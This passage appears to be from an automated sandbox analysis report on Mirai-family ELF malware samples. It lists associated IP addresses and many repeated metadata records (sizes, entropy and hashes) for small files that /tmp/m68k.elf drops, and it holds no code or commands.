                                                                  • 54.168.12.165
                                                                  owari.m68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 108.155.200.101
                                                                  owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 18.188.126.132
                                                                  owari.i586.elfGet hashmaliciousUnknownBrowse
                                                                  • 52.63.235.141
                                                                  owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                  • 108.152.50.58
                                                                  owari.arm.elfGet hashmaliciousUnknownBrowse
                                                                  • 18.152.28.102
                                                                  pspc.elfGet hashmaliciousMiraiBrowse
                                                                  • 54.217.10.153
                                                                  parm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 34.249.145.219
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 34.249.145.219
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 52.43.119.120
                                                                  No context
                                                                  No context
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14
                                                                  Entropy (8bit):3.521640636343319
                                                                  Encrypted:false
                                                                  SSDEEP:3:TgSJJ5:Tg8
                                                                  MD5:1EFD8D1B5A6F6283AB95B88849E296D4
                                                                  SHA1:66A54A8183949E344A02BDFD7594EB85E268B405
                                                                  SHA-256:BA300566EB5918106B44AE584069E3E689DDCFAF467E54D80E7F6755E0D4856C
                                                                  SHA-512:C1D5F73558C046B683B8543D980301B86543289D72DA99DFAF4E6FBEBBDF2F60A71AF1B362577CA3240E3C0600579227255299FF094C40A9C507019A248D31C1
                                                                  Malicious:false
                                                                  Preview:/tmp/m68k.elf.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
